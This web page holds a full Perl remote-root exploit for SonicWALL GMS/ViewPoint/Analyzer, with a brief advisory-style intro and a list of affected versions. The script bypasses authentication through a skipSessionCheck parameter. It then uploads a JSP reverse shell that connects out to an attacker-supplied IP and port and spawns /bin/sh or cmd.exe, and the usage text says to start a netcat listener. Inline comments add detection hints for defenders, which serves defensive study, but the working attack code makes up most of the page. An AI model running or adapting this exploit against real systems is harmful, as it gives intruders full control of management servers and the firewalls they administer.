SonicWALL GMS/VIEWPOINT Remote Root Exploit

Written by:

SonicWALL GMS/VIEWPOINT Remote Root Exploit

The GMS/VIEWPOINT version 6.x and the Analyzer version 7.x are vulnerable to remote attacks which could lead to total control of the system. These versions contain a vulnerability that allows an unauthenticated, remote attacker to bypass authentication on the Web interface.

A remote attacker can exploit this vulnerability through broken session handling in the web application.

The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and  comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster  configuration.

Affected Platforms:

  • Windows/Linux

 

Affected Versions:

  • GMS/ViewPoint 5.0.x
  • GMS/ViewPoint/UMA 5.1.x
  • GMS/ViewPoint/UMA 6.0.x
  • GMS/Analyzer/UMA 7.0.x

 

The code below is to be used for educational purposes only!!!

 

#!/usr/bin/perl

##
#  Title:     SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
#  Name:      sgmsRCE.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts
#  no liability for damage caused by this tool.
#
##

use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;

# Command-line handling. Getopt::Std::getopt() treats every character in its
# spec as a switch that takes a value (here -h, -l and -p); a switch that is
# not in the spec, such as -d, is accepted as a plain flag.
my %args;
getopt('hlp:', \%args);

# -h (base URL of the host to test) is the only mandatory option: when it is
# missing or empty, usage() prints the help text and exits.
my $victim    = $args{h} || usage();
# -l / -p: address and port that are later interpolated, without validation,
# into the generated JSP text (see _writing_shell).
my $lip	      = $args{l};
my $lport     = $args{p};
# -d: detect-only flag; when set, the upload and trigger steps are skipped.
my $detect    = $args{d};
# Fixed name of the JSP file written locally and uploaded. For detection it is
# a weak indicator on its own, since it is a single constant in the script.
my $shellname = "cbs.jsp";

# Print the title banner (goes to STDERR).
banner();

# State filled in by the steps below: install path reported by the server,
# platform tag ("UNX" or "WIN"), and the shell binary named in the JSP.
my $gms_path;
my $target;
my $sysshell;

# HTTP client. verify_hostname => 0 turns off TLS certificate hostname
# checking, so HTTPS endpoints with self-signed or mismatched certificates
# are accepted without complaint.
my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
# Hard-coded User-Agent imitating Firefox 11 on Linux. It appears verbatim in
# web access logs, but it is a one-line constant and a weak indicator alone.
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");

# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');

# Step 1: probe. An unauthenticated POST is sent to
# /appliance/applianceMainPage with the query parameter skipSessionCheck=1,
# asking for the "show_diagnostics" / "search" function over the application
# log. No cookie or credential is attached to the request.
# Defender view: requests to this path carrying skipSessionCheck=1 from
# clients without an authenticated session are the log signature of this step.
print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content  => [   num => "123456",
                action => "show_diagnostics",
                task => "search",
		item => "application_log",
		criteria => "*.*",
		width => "500",
        ];

my $result = $agent->request($request);

# is_success only means a 2xx status came back; "looks vulnerable" is printed
# for any such response. The actual evidence is the path extraction below.
# NOTE(review): "$result->status_line" inside a double-quoted string is not a
# method call; Perl interpolates $result and prints "->status_line" literally.
# The script also exits with status 0 on failure.
if ($result->is_success) {
        print "[+] Host looks vulnerable ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

my @lines=split("\n",$result->content);

# Scan the response for <OPTION VALUE="..."> entries. The first quoted value
# containing "logs" (case-insensitive) is cut at "logs"; the part before it is
# taken as the product's install directory. The loop stops at the first hit.
foreach my $line (@lines) {
	if ($line =~ /OPTION VALUE=/) {
		my @a=split("\"", $line);
		if ($a[1] =~ m/logs/i) {
			my @b=split(/logs/i,$a[1]);
			$gms_path=$b[0];
		}
                if ($gms_path ne "") {
			print "[+] GMS Path: $gms_path\n";
			last;
                } else {
			next;
                }
	}
}
# No path in the response: the diagnostics function did not answer as
# expected, so the script reports "maybe not vulnerable" and stops.
if ($gms_path eq "") {
	print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
	exit(0);
}

# Step 2: platform guess. A path starting with "/" is treated as Unix,
# anything else as Windows. In both cases the web application directory
# Tomcat/webapps/appliance is appended to the install path, and the shell
# binary named in the JSP is chosen (/bin/sh or cmd.exe).
# Defender view: that directory is where an unexpected .jsp file would appear.
if ($gms_path =~ m/^\//) {
	$target="UNX";
	$gms_path=$gms_path."Tomcat/webapps/appliance/";
	$sysshell="/bin/sh";
	print "[+] Target ist Unix...\n";
} else {
	$target="WIN";
	$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
	$sysshell="cmd.exe";
	print "[+] Target ist Windows...\n";
}

# Writes the JSP file into the local working directory. This runs before the
# -d check, so the file is created in detect-only mode as well; the only
# unlink() is inside the upload branch below.
# The "&name;" call form passes the caller's current @_ through.
&_writing_shell;

# Step 3 (skipped when -d is given): upload the JSP and request it once.
if (!$detect) {
print "[+] Uploading shell ...\n";
# Second unauthenticated POST to the same skipSessionCheck=1 endpoint, this
# time multipart/form-data with action "file_system" / task "uploadFile".
# searchFolder is the webapp directory computed above. The array reference in
# uploadFileName makes HTTP::Request::Common send the local file's contents as
# a file part.
# Defender view: a multipart upload to this endpoint followed by a new .jsp
# under Tomcat/webapps/appliance is the file-system trace of this step.
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content	 => [ 	action => "file_system",
		task => "uploadFile",
		searchFolder => "$gms_path",
		uploadFileName => ["$shellname"]
	];

my $result = $agent->request($request);

# As in the probe, success is judged by HTTP status only; the response body is
# not checked for confirmation that the file was stored.
# NOTE(review): "$result->status_line" in the string is not a method call.
if ($result->is_success) {
	print "[+] Upload completed ...\n";
} else {
	print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

# Remove the local copy of the JSP. The early exit above skips this line.
unlink("$shellname");

# A plain GET of /appliance/<name>.jsp makes the server compile and run the
# uploaded page. Defender view: per the JSP text, the Java process then opens
# an outbound TCP connection and starts /bin/sh or cmd.exe as a child, both of
# which are unusual for this service and can be alerted on.
print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");

if ($result->is_success) {
        print "[+] Have fun ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}
}

# Write the JSP text below to the file $shellname in the current working
# directory. Takes no arguments; reads the file-level variables $shellname,
# $lip, $lport and $sysshell, and dies with $! if the file cannot be opened.
#
# The heredoc is double-quoted, so Perl interpolates $lip, $lport and
# $sysshell into the JSP source as given (no validation or escaping).
# "\@page" is escaped only so Perl does not treat @page as an array.
#
# What the generated page does when it is requested: it opens a TCP socket to
# $lip:$lport, starts $sysshell through Runtime.exec(), and runs two
# StreamConnector threads that copy data between the process and the socket.
# Every exception is caught and discarded, so a failure produces no error
# output in the HTTP response.
#
# Defender view: the code runs inside the servlet container with that
# process's privileges. Look for an outbound connection from the Java process
# paired with a shell child process, and for the stray .jsp file itself.
sub _writing_shell {
	# Bareword global filehandle FILE, opened for writing (truncates).
	open FILE, ">", "$shellname" or die $!;
        print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
        class StreamConnector extends Thread
        {
                InputStream is;
                OutputStream os;

                StreamConnector( InputStream is, OutputStream os )
                {
                        this.is = is;
                        this.os = os;
                }
                public void run()
                {
                        BufferedReader in  = null;
                        BufferedWriter out = null;
                        try
                        {
                                in  = new BufferedReader( new InputStreamReader( this.is ) );
                                out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                                char buffer[] = new char[8192];
                                int length;
                                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
                                {
                                        out.write( buffer, 0, length );
                                        out.flush();
                                }
                        } catch( Exception e ){}
                        try
                        {
                                if( in != null )
                                        in.close();
                                if( out != null )
                                        out.close();
                        } catch( Exception e ){}
                }
        }
        try
        {
                Socket socket = new Socket( "$lip", $lport );
                Process process = Runtime.getRuntime().exec( "$sysshell" );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
        } catch( Exception e ) {}
%>

EOF

# The return value of close() is not checked, so a write error that only
# surfaces at close time would go unnoticed.
close(FILE);
}

# Print the command-line help to STDOUT and terminate with exit status 1.
# Takes no arguments and never returns. The script calls it when the
# mandatory -h option is missing.
sub usage {
    my @help_text = (
        "\n",
        " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n",
        "====================================================================\n\n",
        "  Usage:\n",
        "           $0 -h <http://victim> -l <yourip> -p <yourport>\n",
        "  Notes:\n",
        "           Start your netcat listener <nc -lp 4444>\n",
        "           -d only checks if the Host is vulnerable\n",
        "\n",
        "  Author:\n",
        "           Nikolas Sotiriu (lofi)\n",
        "           url: www.sotiriu.de\n",
        "           mail: lofi[at]sotiriu.de\n",
        "\n",
    );

    # One print per entry, in order, exactly as the help text is laid out.
    foreach my $text_line (@help_text) {
        print $text_line;
    }

    exit(1);
}

# Write the title banner to STDERR: a rule line, the title, a second rule
# line and one empty line. Takes no arguments.
sub banner {
    my $rule_line  = "--------------------------------------------------------------------------------\n";
    my $title_line = "       SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit\n";

    print STDERR $rule_line . $title_line . $rule_line . "\n";
}
